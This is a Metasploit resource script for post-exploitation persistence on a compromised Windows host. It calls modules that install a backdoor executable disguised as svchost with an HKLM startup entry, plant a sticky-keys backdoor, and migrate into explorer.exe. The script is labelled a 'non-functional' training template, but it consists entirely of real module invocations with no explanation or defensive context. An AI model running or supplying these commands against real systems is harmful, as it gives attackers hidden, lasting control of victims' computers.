# Registry Persistence Template
# For Training Use – Non-functional Template

use post/windows/manage/persistence_exe
set SESSION 1
set REXEPATH /tmp/backdoor.exe
set REXENAME svchost
set STARTUP HKLM
run

use post/windows/manage/sticky_keys
set SESSION 1
run

use post/windows/manage/priv_migrate
set SESSION 1
set NAME explorer.exe
run